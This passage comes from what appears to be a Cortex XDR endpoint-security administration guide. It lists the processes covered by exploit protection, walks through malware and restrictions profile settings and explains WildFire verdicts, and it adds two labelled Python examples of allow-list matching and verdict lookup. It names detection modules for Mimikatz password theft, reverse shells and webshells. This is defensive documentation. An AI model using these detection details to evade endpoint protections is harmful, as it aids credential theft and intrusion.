• nginx.exe
• notepad++.exe
• nslookup.exe
• outlook.exe
• powerpnt.exe
• pptview.exe
• qttask.exe
• quicktimeplayer.exe
• rar.exe
• reader_sl.exe
• realconverter.exe
• realplay.exe
• realsched.exe
• skype.exe
• skypeapp.exe
• skypehost.exe
• SLMail.exe
• soffice.exe
• telnet.exe
• unrar.exe
• vboxservice.exe
• vboxsvc.exe
• vboxtray.exe
• video.ui.exe
• visio.exe
• vlc.exe
• vmware-authd.exe
• vmware-hostd.exe
• vmware-vmx.exe
• vpreview.exe
• vprintproxy.exe
• wab.exe
• w3wp.exe
• winrar.exe
• winword.exe
• wireshark.exe
• wmplayer.exe
• wmpnetwk.exe
• xpsrchvw.exe

Operating System Exploit Protection

• ctfmon.exe
• dllhost.exe
• dns.exe
• lsass.exe
• msmpeng.exe
• runtimebroker.exe
• spoolsv.exe
• svchost.exe
• taskeng.exe
• taskhost.exe
• wmiprvse.exe
• wmiprvse.exe
• wwahost.exe

Mac Processes Protected by Exploit Security Policy

Browser Exploits Protection

• com.apple.safariservices • firefox • plugin-container


• com.apple.webkit.plugin • firefox-bin • safari
• com.apple.webkit.plugin.64 • google chrome helper • seamonkey
• com.apple.webkit.webcontent • google chrome

Logical Exploits Protection

• adobereader
• app drive for google drive
• app drop for dropbox
• app for dropbox
• app for facebook
• app for google drive
• app for googledocs
• app for instagram
• app for linkedin
• app for youtube
• com.apple.safariservices
• com.apple.webkit.plugin
• com.apple.webkit.plugin.64
• com.apple.webkit.webcontent
• document writer
• firefox
• firefox-bin
• google chrome helper
• google chrome
• itunes helper
• itunes
• mail+ for yahoo
• microsoft excel
• microsoft outlook
• microsoft powerpoint
• microsoft remote desktop
• microsoft word
• miniwriterfree
• parallels client
• pdf reader pro free
• pdf reader x
• plugin-container
• quicktime player
• safari
• seamonkey
• slack
• sonicwall mobile connect
• textwrangler
• vlc
• vmware fusion services
• vmware fusion
• vpn shield
• winmail.dat file viewer


Known Vulnerable Processes Protection

• adobereader
• airmail
• app drive for google drive
• app drop for dropbox
• app for dropbox
• app for facebook
• app for google drive
• app for googledocs
• app for instagram
• app for linkedin
• app for youtube
• bbedit
• c-lion
• cisco anyconnect secure mobility client
• com.apple.cloudphotosconfiguration
• document writer
• itunes helper
• itunes
• jump desktop
• mail
• mail+ for yahoo
• messages
• microsoft excel
• microsoft outlook
• microsoft powerpoint
• microsoft remote desktop
• microsoft word
• miniwriterfree
• parallels client
• pdf reader pro free
• pdf reader x
• photos
• photoshop
• quickbooks
• quicktime player
• signal
• slack
• sonicwall mobile connect
• telegram
• textmate
• textwrangler
• thunderbird
• vlc
• vmware fusion services
• vmware fusion
• vpn shield
• winmail.dat file viewer

Linux Processes Protected by Exploit Security Policy

Known Vulnerable Processes Protection

• anacron
• apache2
• authproxy
• bluetoothd
• charon
• chronyd
• couriertcpd
• cron
• crond
• cupsd
• cyrus_pop3d
• danted
• dhcpd
• dovecot
• exim
• ftpd
• httpd
• ibserver
• identd
• lighttpd
• kamailio
• mailman
• master
• mongod
• mysqld
• mysqld_safe
• named
• ndsd
• nginx
• nmbd
• node
• nscd
• php
• php5-fpm
• pmmasterd
• pop2d
• pop3d
• postgres
• proftpd
• qmgr
• rpcbind
• rsync
• rsyslogd
• ruby
• samba
• saned
• sendmail
• sendmail.sendmail
• smartd
• smbd
• snmpd
• squid
• squid3
• starter
• syslog-ng
• tinyproxy
• vsftpd
• wickedd-dhcp4
• wickedd-dhcp6
• winbindd
• xinetd

Add a New Malware Security Profile
Malware security profiles allow you to configure the action Cortex XDR agents take when known malware
and unknown files try to run on Windows, Mac, Linux, and Android endpoints.
By default, the Cortex XDR agent will receive the default profile that contains a pre-defined configuration
for each malware protection capability supported by the platform. To fine-tune your Malware security
policy, you can override the configuration of each capability to block the malicious behavior or file, allow
but report it, or disable the module. For each setting you override, clear the option to Use Default.
To configure a Malware security profile:

STEP 1 | Add a new profile.


1. From Cortex XDR, select Endpoints > Policy Management > Profiles > + New Profile.
2. Select the platform to which the profile applies and Malware as the profile type.

STEP 2 | Identify the profile.


1. Enter a unique Profile Name to identify the profile. The name can contain only letters, numbers, or
spaces, and must be no more than 30 characters. The name you choose will be visible from the list of
profiles when you configure a policy rule.
2. To provide additional context for the purpose or business reason that explains why you are creating
the profile, enter a profile Description. For example, you might include an incident identification
number or a link to a help desk ticket.

STEP 3 | Configure the Cortex XDR agent to examine executable files, macros, or DLL files on Windows
endpoints, Mach-O files or DMG files on Mac endpoints, ELF files on Linux endpoints, or APK
files on Android endpoints.
1. Configure the Action Mode—the behavior of the Cortex XDR agent—when malware is detected:
• Block—Block attempts to run malware.
• Report—Report but do not block malware that attempts to run.
• (Android only) Prompt—Enable the Cortex XDR agent to prompt the user when malware is
detected and allow the user to choose to allow malware, dismiss the notification, or uninstall the
app.
• Disabled—Disable the module and do not examine files for malware.
2. Configure additional actions to examine files for malware.
By default, Cortex XDR uses the settings specified in the default malware security profile and
displays the default configuration in parentheses. When you select a setting other than the default,
you override the default configuration for the profile.
• (Windows only) Quarantine Malicious Executables—By default, the Cortex XDR agent blocks
malware from running but does not quarantine the file. Enable this option to quarantine files
depending on the verdict issuer (local analysis, WildFire, or both local analysis and WildFire).
Cortex XDR can quarantine only Portable Executables (PEs).
The quarantine feature is not available for malware identified in network drives.
• Upload <file_type> files for cloud analysis—Enable the Cortex XDR agent to send unknown files
to Cortex XDR, and for Cortex XDR to send the files to WildFire for analysis. With macro analysis,
the Cortex XDR agent sends the Microsoft Office file containing the macro. The file types that the
Cortex XDR agent analyzes depend on the platform type. WildFire accepts files up to 100MB in
size.
• Treat Grayware as Malware—Treat all grayware with the same Action Mode you configure for
malware. Otherwise, if this option is disabled, grayware is considered benign and is not blocked.

• Action on Unknown to WildFire—Select the behavior of the Cortex XDR agent when an unknown
file tries to run on the endpoint (Allow, Run Local Analysis, or Block). With local analysis, the
Cortex XDR agent uses embedded machine learning to determine the likelihood that an unknown
file is malware and issues a local verdict for the file. If you block unknown files but do not run local
analysis, unknown files remain blocked until the Cortex XDR agent receives an official WildFire
verdict.
• (Windows only) Examine Office Files From Network Drives—Enable the Cortex XDR agent to
examine Microsoft Office files in network drives when they contain a macro that attempts to run.
If this option is disabled, the Cortex XDR agent will not examine macros in network drives.

(Windows only) As part of the anti-malware security flow, the Cortex XDR agent leverages the OS capability
to identify revoked certificates for executables and DLL files that attempt to run on the endpoint by
accessing the Windows Certificate Revocation List (CRL). To allow the Cortex XDR agent to access the CRL,
you must enable internet access over port 80 for Windows endpoints running Traps 6.0.3 and later releases,
Traps 6.1.1 and later releases, or Cortex XDR 7.0 and later releases. If the endpoint is not connected to
the internet, or you experience delays with executables and DLLs running on the endpoint, contact Palo Alto
Networks Support.
3. (Optional) Add files and folders to your allow list to exclude them from examination.
1. +Add a file or folder.
2. Enter the path and press Enter or click the check mark when done. You can also use a wildcard to
match files and folders containing a partial name. Use ? to match a single character or * to match
any string of characters. To match a folder, you must terminate the path with * to match all files in
the folder (for example, c:\temp\*).
3. Repeat to add additional files or folders.
4. Add signers to your allow list to exclude them from examination.
When a file that is signed by a signer you included in your allow list attempts to run,
1. +Add a trusted signer.
2. Enter the name of the trusted signer (Windows) or the SHA1 hash of the certificate that signs
the file (Mac) and press Enter or click the check mark when done. You can also use a wildcard to
match a partial name for the signer. Use ? to match any single character or * to match any string
of characters.
3. Repeat to add additional trusted signers.

STEP 4 | (Windows, Mac, and Linux only) Configure Behavioral Threat Protection.

Behavioral threat protection requires Traps agent 6.0 or a later release for Windows
endpoints, and Traps 6.1 or later versions for Mac and Linux endpoints.

With Behavioral threat protection, the agent continuously monitors endpoint activity to identify and
analyze chains of events—known as causality chains. This enables the agent to detect malicious activity
in the chain that could otherwise appear legitimate if inspected individually. A causality chain can
include any sequence of network, process, file, and registry activities on the endpoint. Behavioral threat
protection can also identify behavior related to vulnerable drivers on Windows endpoints. For more
information on data collection for Behavioral Threat Protection, see Endpoint Data Collected by Cortex
XDR.
Palo Alto Networks researchers define the causality chains that are malicious and distribute those chains
as behavioral threat rules. When the Cortex XDR agent detects a match to a behavioral threat protection
rule, the Cortex XDR agent carries out the configured action (default is Block). In addition, the Cortex
XDR agent reports the behavior of the entire event chain up to the process, known as the causality
group owner (CGO), that the Cortex XDR agent identified as triggering the event sequence.

To configure Behavioral Threat Protection:
1. Define the Action mode to take when the Cortex XDR agent detects malicious causality chains:
• Block (default)—Block all processes and threads in the event chain up to the CGO.
• Report—Allow the activity but report it to Cortex XDR.
• Disabled—Disable the module and do not analyze or report the activity.
2. Define whether to quarantine the CGO when the Cortex XDR agent detects a malicious event chain.
• Enabled—Quarantine the CGO if the file is not signed by a highly trusted signer. When the CGO is
signed by a highly trusted signer or powershell.exe, wscript.exe, cscript.exe, mshta.exe, excel.exe,
word.exe or powerpoint.exe, the Cortex XDR agent parses the command-line arguments and
instead quarantines any scripts or files called by the CGO.
• Disabled (default)—Do not quarantine the CGO of an event chain nor any scripts or files called by
the CGO.
3. (Windows only) Define the Action Mode for Vulnerable Drivers Protection.
Behavioral threat protection rules can also detect attempts to load vulnerable drivers. As with other
rules, Palo Alto Networks threat researchers can deliver changes to vulnerable driver rules with
content updates.
• Block (default)—Block all attempts to run vulnerable drivers.
• Report—Allow vulnerable drivers to run but report the activity.
• Disabled—Disable the module and do not analyze or report the activity.
4. (Optional) Add files that you do not want the Cortex XDR agent to terminate when a malicious
causality chain is detected to your allow list. The allow list does not apply to vulnerable drivers.
1. +Add a file path.
2. Enter the file path you want to exclude from evaluation. Use ? to match a single character or * to
match any string of characters.
3. Click the checkmark to confirm the file path.
4. Repeat the process to add any additional file paths to your allow list.

STEP 5 | (Windows only, requires a Cortex XDR agent 7.3 or a later release) Respond to Malicious Causality
Chains.
When the Cortex XDR agent identifies a remote network connection that attempts to perform malicious
activity—such as encrypting endpoint files—the agent can automatically block the IP address to close all
existing communication, and block new connections from this IP address to the endpoint. When Cortex
XDR blocks an IP address per endpoint, that address remains blocked throughout all agent profiles and
policies, including any host-firewall policy rules. You can view the list of all blocked IP addresses per
endpoint from the Action Center, as well as unblock them to re-enable communication as appropriate.

This capability is supported for network connections made in IPv4 only.

1. Select the Action Mode to take when the Cortex XDR agent detects remote malicious causality
chains:
• Enabled (default)—Terminate connection and block IP address of the remote connection.
• Disabled—Do not block remote IP addresses.
2. To allow specific, known-safe IP addresses or IP address ranges that you do not want Cortex XDR to
block, add them to your allow list.
+Add and then specify the IP address.

STEP 6 | (Windows only) Configure Ransomware Protection.

1. Define the Action mode to take when the Cortex XDR agent detects ransomware activity locally on
the endpoint or in pre-defined network folders:
• Block (default)—Block the activity.
• Report—Allow the activity but report it to Cortex XDR.
• Disabled—Disable the module and do not analyze or report the activity.
2. Choose whether you want the Cortex XDR agent to Quarantine Malicious Process when
ransomware is detected.
The quarantine option is only available if the Action mode is Block.
3. Configure the ransomware module Protection mode.
By default, the protection mode is set to Normal where the decoy files on the endpoint are present,
but do not interfere with benign applications and end user activity on the endpoint. If you suspect
your network has been infected with ransomware and need to provide better coverage, you can
apply the Aggressive protection mode. The aggressive mode exposes more applications in your
environment to the Cortex XDR agent decoy files, while also increasing the likelihood that benign
software is exposed to decoy files, raising false ransomware alerts, and impairing user experience.
4. Choose whether to enable Cortex XDR to Extend Protection to SMB Shares.
To exclude a specific share or specific folder on a share from ransomware protection, add it to the
allow list. For example, add the share in the format \\fileshare or \\fileshare\subfolder.
You can also use ? to match a single character or * to match any string of characters (for example,
\\fileshare\subfolder\sub*).

STEP 7 | (Windows only) Configure the Cortex XDR agent to Prevent Malicious Child Process Execution.
1. Select the Action Mode to take when the Cortex XDR agent detects malicious child process
execution:
• Block—Block the activity.
• Report—Allow the activity but report it to Cortex XDR.
2. To allow specific processes to launch child processes for legitimate purposes, add the child process to
your allow list with optional execution criteria.
+Add and then specify the allow list criteria including the Parent Process Name, Child Process Name,
and Command Line Params. Use ? to match a single character or * to match any string of characters.

If you are adding child process evaluation criteria based on a specific security event,
the event indicates both the source process and the command line parameters in one
line. Copy only the command line parameter for use in the profile.
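The wildcard rules used by the allow lists above (the file and folder paths in STEP 3 and the Parent Process Name, Child Process Name and Command Line Params criteria in STEP 7) behave as follows, shown here as an added example in Python rather than code from Cortex XDR itself. Case-insensitive comparison for Windows paths and process names, and case-sensitive comparison for Linux paths, are assumptions of this example, not statements from the guide.

```python
import re
from dataclasses import dataclass
from typing import Iterable

# Added example (not Cortex XDR code): models the allow-list wildcard rules the
# guide gives for file/folder paths and for child-process criteria. "?" matches
# exactly one character and "*" matches any string of characters, including path
# separators, so a folder is only covered when its pattern ends in "*"
# (c:\temp\* rather than c:\temp).
# Assumption not stated in the guide: Windows paths and process names are
# compared case-insensitively, Linux paths case-sensitively.


def wildcard_to_regex(pattern: str, case_insensitive: bool = True) -> "re.Pattern[str]":
    """Translate a ? / * wildcard pattern into a regular expression."""
    parts = []
    for ch in pattern:
        if ch == "*":
            parts.append(".*")       # any string of characters (also empty)
        elif ch == "?":
            parts.append(".")        # exactly one character
        else:
            parts.append(re.escape(ch))
    flags = re.IGNORECASE if case_insensitive else 0
    return re.compile("".join(parts), flags)


def wildcard_match(pattern: str, value: str, case_insensitive: bool = True) -> bool:
    """True when the whole value matches the pattern (no partial matches)."""
    return wildcard_to_regex(pattern, case_insensitive).fullmatch(value) is not None


def path_allowed(allow_list: Iterable[str], path: str, case_insensitive: bool = True) -> bool:
    """True if an allow-list entry covers the path, i.e. the file is excluded from examination."""
    return any(wildcard_match(entry, path, case_insensitive) for entry in allow_list)


@dataclass(frozen=True)
class ChildProcessRule:
    """One row of the Prevent Malicious Child Process Execution allow list."""
    parent: str
    child: str
    command_line: str = "*"      # optional criteria; "*" accepts any parameters


def child_process_allowed(rules: Iterable[ChildProcessRule], parent: str,
                          child: str, command_line: str) -> bool:
    """True if one rule matches all three criteria for this parent/child launch."""
    return any(
        wildcard_match(rule.parent, parent)
        and wildcard_match(rule.child, child)
        and wildcard_match(rule.command_line, command_line)
        for rule in rules
    )


# Constructed sample configuration mirroring the guide's own path examples.
MALWARE_ALLOW_LIST = ["c:\\temp\\*", "C:\\*\\temp"]
CHILD_PROCESS_RULES = [ChildProcessRule("winword.exe", "cmd.exe", "/c dir*")]

if __name__ == "__main__":
    print(path_allowed(MALWARE_ALLOW_LIST, "C:\\Temp\\build\\tool.exe"))   # folder covered by c:\temp\*
    print(path_allowed(["c:\\temp"], "c:\\temp\\tool.exe"))                  # no trailing *: not covered
    print(child_process_allowed(CHILD_PROCESS_RULES, "WINWORD.EXE", "cmd.exe", "/c dir c:\\"))
```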

STEP 8 | (Windows and Mac only) Enable endpoint file scanning.

Periodic scanning enables you to scan endpoints on a recurring basis without waiting for malware to
run on the endpoint. To better understand how the agent scans the endpoint, refer to Scan an Endpoint
for Malware.

When periodic scanning is enabled in your profile, the Cortex XDR agent initiates an
initial scan when it is first installed on the endpoint, regardless of the periodic scanning
scheduling time.

1. Configure the Action Mode for the Cortex XDR agent to periodically scan the endpoint for malware:
Enabled to scan at the configured intervals, Disabled (default) if you don’t want the Cortex XDR
agent to scan the endpoint.
2. To configure the scan schedule, set the frequency (Run Weekly or Run Monthly) and day and time at
which the scan will run on the endpoint.
Just as with an on-demand scan, a scheduled scan will resume after a reboot, process interruption, or
operating system crash.
3. (Windows only) To include removable media drives in the scheduled scan, enable the Cortex XDR
agent to Scan Removable Media Drives.
4. Add folders to your allow list to exclude them from examination.
1. Add (+) a folder.
2. Enter the folder path. Use ? to match a single character or * to match any string of characters in
the folder path (for example, C:\*\temp).
3. Press Enter or click the check mark when done.
4. Repeat to add additional folders.

STEP 9 | (Windows Vista and later Windows releases) Enable Password Theft Protection.
Select Enabled to enable the Cortex XDR agent to prevent attacks that use the Mimikatz tool to extract
passwords from memory. When set to Enabled, the Cortex XDR agent silently prevents attempts to steal
credentials (no notifications are provided when these events occur). The Cortex XDR agent enables this
protection module following the next endpoint reboot. If you don’t want to enable the module, select
Disabled.

This module is supported with Traps agent 5.0.4 and later releases.

STEP 10 | (Linux only) Enable Local File Threat Examination.


The Local Threat-Evaluation Engine (LTEE) enables the Cortex XDR agent to detect webshells and
optionally quarantine malicious PHP files on the endpoint.

This module is supported with Cortex XDR agent 7.2.0 and later releases.

1. Select the Action Mode to take when the Cortex XDR agent detects the malicious behavior.
• Enable—Enable the Cortex XDR agent to analyze the endpoint for PHP files arriving from the web
server and alert of any malicious PHP scripts.
• Disable—Disable the module and do not analyze or report the activity.
2. Quarantine malicious files.
When Enabled, the Cortex XDR agent quarantines malicious PHP files on the endpoint. The agent
quarantines newly created PHP files only, and does not quarantine updated files.
3. (Optional) Add files and folders to your allow list to exclude them from examination.
1. +Add a file or folder.
2. Enter the path and press Enter or click the check mark when done. You can also use * to match
files and folders containing a partial name. To match a folder, you must terminate the path with *
to match all files in the folder (for example, /usr/bin/*).
3. Repeat to add additional files or folders.

STEP 11 | (Linux only) Configure Reverse Shell Protection.


The Reverse Shell Protection module enables the Cortex XDR agent to detect and optionally block
attempts to redirect standard input and output streams to network sockets.
1. Define the Action Mode to take when the Cortex XDR agent detects the malicious behavior.
• Block—Block the activity.
• Report—Allow the activity but report it to Cortex XDR.
• Disabled—Disable the module and do not analyze or report the activity.
2. (Optional) Add processes to your allow list that must redirect streams to network sockets.
1. +Add a connection.
2. Enter the path of the process, and the local and remote IP address and ports.
Use a wildcard to match a partial path name. Use a * to match any string of characters (for
example, */bash). You can also use a * to match any IP address or any port.

3. Press Enter or click the check mark when done.
4. Repeat to add additional connections.

STEP 12 | Save the changes to your profile.

STEP 13 | Apply Security Profiles to Endpoints.


You can do this in two ways: You can Create a new policy rule using this profile from the right-click
menu or you can launch the new policy wizard from Policy Rules.

WildFire Analysis Concepts


• File Forwarding
• File Type Analysis
• Verdicts
• Local Verdict Cache
File Forwarding
Cortex XDR sends unknown samples for in-depth analysis to WildFire. WildFire accepts up to 1,000,000
sample uploads per day and up to 1,000,000 verdict queries per day from each Cortex XDR tenant. The
daily limit resets at 23:59:00 UTC. Uploads that exceed the sample limit are queued for analysis after
the limit resets. WildFire also limits sample sizes to 100MB. For more information, see the WildFire
documentation.
For samples that the Cortex XDR agent reports, the agent first checks its local cache of hashes to determine
if it has an existing verdict for that sample. If the Cortex XDR agent does not have a local verdict, the Cortex
XDR agent queries Cortex XDR to determine if WildFire has previously analyzed the sample. If the sample
is identified as malware, it is blocked. If the sample remains unknown after comparing it against existing
WildFire signatures, Cortex XDR forwards the sample for WildFire analysis.
File Type Analysis
The Cortex XDR agent analyzes files based on the type of file, regardless of the file’s extension. For deep
inspection and analysis, you can also configure your Cortex XDR to forward samples to WildFire. A sample
can be:
• Any Portable Executable (PE) file including (but not limited to):
• Executable files
• Object code
• FON (Fonts)
• Microsoft Windows screensaver (.scr) files
• Microsoft Office files containing macros opened in Microsoft Word (winword.exe) and Microsoft Excel
(excel.exe):
• Microsoft Office 2003 to Office 2016—.doc and .xls
• Microsoft Office 2010 and later releases—.docm, .docx, .xlsm, and .xlsx
• Dynamic-link library file including (but not limited to):
• .dll files
• .ocx files
• Android application package (APK) files
• Mach-o files
• DMG files
• Linux (ELF) files
For information on file-examination settings, see Add a New Malware Security Profile.
Verdicts
WildFire delivers verdicts to identify samples it analyzes as safe, malicious, or unwanted (grayware is
considered obtrusive but not malicious):
• Unknown—Initial verdict for a sample that WildFire has received but has not yet analyzed.
• Benign—The sample is safe and does not exhibit malicious behavior.
• Malware—The sample is malware and poses a security threat. Malware can include viruses, worms,
Trojans, Remote Access Tools (RATs), rootkits, botnets, and malicious macros. For files identified as
malware, WildFire generates and distributes a signature to prevent against future exposure to the threat.
• Grayware—The sample does not pose a direct security threat, but might display otherwise obtrusive
behavior. Grayware typically includes adware, spyware, and Browser Helper Objects (BHOs).
When WildFire is not available or integration is disabled, the Cortex XDR agent can also assign a local
verdict for the sample using additional methods of evaluation. When the Cortex XDR agent performs local
analysis on a file, it uses pattern-matching rules and machine learning to determine the verdict. The Cortex
XDR agent can also compare the signer of a file with a local list of trusted signers to determine whether a
file is malicious:
• Local analysis verdicts:
• Benign—Local analysis determined the sample is safe and does not exhibit malicious behavior.
• Malware—The sample is malware and poses a security threat. Malware can include viruses, worms,
Trojans, Remote Access Tools (RATs), rootkits, botnets, and malicious macros.
• Trusted signer verdicts:
• Trusted—The sample is signed by a trusted signer.
• Not Trusted—The sample is not signed by a trusted signer.
Local Verdict Cache
The Cortex XDR agent stores hashes and the corresponding verdicts for all files that attempt to run on the
endpoint in its local cache. The local cache scales in size to accommodate the number of unique executable
files opened on the endpoint. On Windows endpoints, the cache is stored in the
C:\ProgramData\Cyvera\LocalSystem folder on the endpoint. When service protection is enabled (see Add a New
Agent Settings Profile), the local cache is accessible only by the Cortex XDR agent and cannot be changed.
Each time a file attempts to run, the Cortex XDR agent performs a lookup in its local cache to determine if
a verdict already exists. If known, the verdict is either the official WildFire verdict or manually set as a hash
exception. Hash exceptions take precedence over any additional verdict analysis.
If the file is unknown in the local cache, the Cortex XDR agent queries Cortex XDR for the verdict. If Cortex
XDR receives a verdict request for a file that was already analyzed, Cortex XDR immediately responds to
the Cortex XDR agent with the verdict.
If Cortex XDR does not have a verdict for the file, it queries WildFire and optionally submits the file for
analysis. While the Cortex XDR agent waits for an official WildFire verdict, it can use File Analysis
and Protection Flow to evaluate the file. After Cortex XDR receives the verdict it responds to the Cortex
XDR agent that requested the verdict.
For information on file-examination settings, see Add a New Malware Security Profile.
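The lookup order described above (hash exception, local cache, Cortex XDR query, WildFire forwarding) combined with the Action on Unknown to WildFire and Treat Grayware as Malware settings from Add a New Malware Security Profile, traced in Python as an added example that is not Cortex XDR's own code. The SHA-256 hashing, the in-memory cloud lookup, the toy local-analysis heuristic and all sample contents are constructed stand-ins for this example.

```python
import hashlib
from dataclasses import dataclass, field
from enum import Enum
from typing import Callable, Dict, Tuple

# Added example (not Cortex XDR code): models the verdict lookup order the guide
# describes (hash exception, local cache, Cortex XDR/WildFire query, then the
# profile's "Action on Unknown to WildFire") and the Action Mode applied to the
# resulting verdict. File contents, hashes and the cloud lookup are constructed;
# SHA-256 as the cache key is an assumption of this example.


class Verdict(Enum):
    UNKNOWN = "unknown"
    BENIGN = "benign"
    MALWARE = "malware"
    GRAYWARE = "grayware"


class UnknownAction(Enum):
    ALLOW = "allow"
    RUN_LOCAL_ANALYSIS = "run local analysis"
    BLOCK = "block"


@dataclass
class MalwareProfile:
    action_mode: str = "block"                       # block | report | disabled
    treat_grayware_as_malware: bool = False
    action_on_unknown: UnknownAction = UnknownAction.RUN_LOCAL_ANALYSIS


@dataclass
class Agent:
    cloud_lookup: Callable[[str], Verdict]           # stands in for the Cortex XDR / WildFire query
    local_analysis: Callable[[bytes], Verdict]       # stands in for the embedded ML model
    hash_exceptions: Dict[str, Verdict] = field(default_factory=dict)
    local_cache: Dict[str, Verdict] = field(default_factory=dict)

    def resolve(self, data: bytes) -> Tuple[Verdict, str]:
        """Return the verdict for a sample and the stage that produced it."""
        digest = hashlib.sha256(data).hexdigest()
        if digest in self.hash_exceptions:           # admin override takes precedence
            return self.hash_exceptions[digest], "hash exception"
        if digest in self.local_cache:               # already seen on this endpoint
            return self.local_cache[digest], "local cache"
        verdict = self.cloud_lookup(digest)          # Cortex XDR answers from prior WildFire analysis
        if verdict is not Verdict.UNKNOWN:
            self.local_cache[digest] = verdict       # official verdicts are cached locally
        return verdict, "cortex xdr"

    def decide(self, profile: MalwareProfile, data: bytes) -> Tuple[str, Verdict, str]:
        """Apply the profile to a sample: returns (action, verdict used, stage)."""
        if profile.action_mode == "disabled":
            return "allow", Verdict.UNKNOWN, "module disabled"
        verdict, stage = self.resolve(data)
        if verdict is Verdict.UNKNOWN:
            # The sample is forwarded to WildFire; until the official verdict arrives,
            # the profile's Action on Unknown decides what happens on the endpoint.
            if profile.action_on_unknown is UnknownAction.ALLOW:
                return "allow", verdict, "unknown: allowed pending wildfire"
            if profile.action_on_unknown is UnknownAction.BLOCK:
                return "block", verdict, "unknown: blocked pending wildfire"
            verdict, stage = self.local_analysis(data), "local analysis"
        if verdict is Verdict.GRAYWARE:
            if not profile.treat_grayware_as_malware:
                return "allow", verdict, stage       # grayware is considered benign
            verdict = Verdict.MALWARE
        if verdict is Verdict.MALWARE:
            action = "block" if profile.action_mode == "block" else "report"
            return action, verdict, stage
        return "allow", verdict, stage


# Constructed samples and a constructed stand-in for WildFire's verdict database.
KNOWN_MALWARE = b"constructed sample: known malware"
KNOWN_GRAYWARE = b"constructed sample: adware bundle"
FALSE_POSITIVE = b"constructed sample: in-house tool flagged by mistake"
NEVER_SEEN = b"constructed sample: brand new binary"

_CLOUD_VERDICTS = {
    hashlib.sha256(KNOWN_MALWARE).hexdigest(): Verdict.MALWARE,
    hashlib.sha256(KNOWN_GRAYWARE).hexdigest(): Verdict.GRAYWARE,
    hashlib.sha256(FALSE_POSITIVE).hexdigest(): Verdict.MALWARE,
}

def fake_cloud_lookup(digest: str) -> Verdict:
    return _CLOUD_VERDICTS.get(digest, Verdict.UNKNOWN)

def fake_local_analysis(data: bytes) -> Verdict:
    # Toy stand-in for the embedded model: flags only a constructed marker string.
    return Verdict.MALWARE if b"malicious" in data else Verdict.BENIGN

def build_agent() -> Agent:
    agent = Agent(fake_cloud_lookup, fake_local_analysis)
    # Hash exception set by an administrator: overrides the WildFire verdict for the in-house tool.
    agent.hash_exceptions[hashlib.sha256(FALSE_POSITIVE).hexdigest()] = Verdict.BENIGN
    return agent
```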

Add a New Restrictions Security Profile


Restrictions security profiles limit the surface of an attack on a Windows endpoint by defining where and
how your users can run files.
By default, the Cortex XDR agent will receive the default profile that contains a pre-defined configuration
for each restrictions capability. To customize the configuration for specific Cortex XDR agents, configure a
new Restrictions security profile and assign it to one or more policy rules.
To define a Restrictions security profile:

STEP 1 | Add a new profile.


1. From Cortex XDR, select Endpoints > Policy Management > Profiles > + New Profile.
2. Select the platform to which the profile applies and Restrictions as the profile type.
3. Click Next.

STEP 2 | Define the basic settings.


1. Enter a unique Profile Name to identify the profile. The name can contain only letters, numbers, or
spaces, and must be no more than 30 characters. The name you choose will be visible from the list of
profiles when you configure a policy rule.
2. To provide additional context for the purpose or business reason that explains why you are creating
the profile, enter a profile Description. For example, you might include an incident identification
number or a link to a help desk ticket.

STEP 3 | Configure each of the Restrictions Endpoint Protection Capabilities.


1. Configure the action to take when a file attempts to run from a specified location.
• Block—Block the file execution.
• Notify—Allow the file to execute but notify the user that the file is attempting to run from a
suspicious location. The Cortex XDR agent also reports the event to Cortex XDR.
• Report—Allow the file to execute but report it to Cortex XDR.
• Disabled—Disable the module and do not analyze or report execution attempts from restricted
locations.
2. Add files to your allow list or block list, as needed.
The type of protection capability determines whether the capability supports an allow list, block list,
or both. With an allow list, the action mode you configure applies to all the paths except for those
that you specify. With a block list, the action applies only to the paths that you specify.
1. +Add a file or folder.
2. Enter the path and press Enter or click the check mark when done. You can also use a wildcard
to match a partial name for the folder and environment variables. Use ? to match any single
character or * to match any string of characters. To match a folder, you must terminate the path
with * to match all files in the folder (for example, c:\temp\*).
3. Repeat to add additional folders.

STEP 4 | Save the changes to your profile.

STEP 5 | Apply Security Profiles to Endpoints.

You can do this in two ways: You can Create a new policy rule using this profile from the right-click
menu or you can launch the new policy wizard from Policy Rules.

Manage Security Profiles


After you customize your Endpoint Security Profiles you can manage them from the Profiles page, as
needed.
• View information about your security profiles
• Edit a security profile
• Duplicate a security profile
• View the security profile rules that use a security profile
• Populate a new policy rule with a security profile
• Delete a security profile

• View information about your security profiles.


The following table displays the fields that are available on the Profiles page in alphabetical order. The
table includes both default fields and additional fields that are available in the column manager.

Field: Description

Created By: Administrative user who created the security profile.

Created Time: Date and time at which the security profile was created.

Description: Optional description entered by an administrator to describe the security profile.

Modification Time: Date and time at which the security profile was modified.

Modified By: Administrative user who modified the security profile.

Name: Name provided to identify the security profile.

Platform: Platform type of the security profile.

Summary: Summary of security profile configuration.

Type: Security profile type.

Usage Count: Number of policy rules that use the

• Edit a security profile.


1. From Endpoints > Policy Management > Profiles, right-click the security profile and select Edit.
2. Make your changes and then Save the security profile.

• Duplicate a security profile.

1. From Endpoints > Policy Management > Profiles, right-click the security profile and select Save as
New.
2. Make your changes and then Create the security profile.
3. Populate a new policy rule with a security profile.

• View the security policy rules that use a security profile.


From Endpoints > Policy Management > Profiles, right-click the security profile and select View security
policies.
Cortex XDR displays the policy rules that use the profile.

• Populate a new policy rule with a security profile.


1. From Endpoints > Policy Management > Profiles, right-click the security profile and Create a new
policy rule using this profile.
Cortex XDR automatically populates the Platform selection based on your security profile
configuration and assigns the security profile based on the security profile type.
2. Enter a descriptive Policy Name and optional description for the policy rule.
3. Assign any additional security profiles that you want to apply to your policy rule, and select Next.
4. Select the target endpoints for the policy rule or use the filters to define criteria for the policy rule to
apply, and then select Next.
5. Review the policy rule summary, and if everything looks good, select Done.

• Delete a security profile.


1. If necessary, delete or detach any policy rules that use the profile before attempting to delete it.
2. From Endpoints > Policy Management > Profiles, identify the security profile that you want to
remove.
The Usage Count should have a 0 value.
3. Right-click the security profile and select Delete.
4. Confirm the deletion and you are done.

Customizable Agent Settings
Each Agent Settings Profile provides a tailored list of settings that you can configure for the platform you
select.
In addition to the customizable Agent Settings Profiles, you can also:
• Configure Global Agent Settings that apply to all the endpoints in your network.
• Configure Hardened Endpoint Security protections that leverage existing mechanisms and added capabilities
to reduce the attack surface on your endpoints.
The following table describes these customizable settings and indicates which platforms support the setting
(a dash (—) indicates the setting is not supported).

Setting Windows Mac Linux Android

Agent Profiles

Disk Space —
Customize the amount of
disk space the Cortex XDR
agent uses to store logs and
information about events.

User Interface — —
Determine whether and
how end users can access
the Cortex XDR console.

Traps Tampering — — —
Protection
Prevent users from
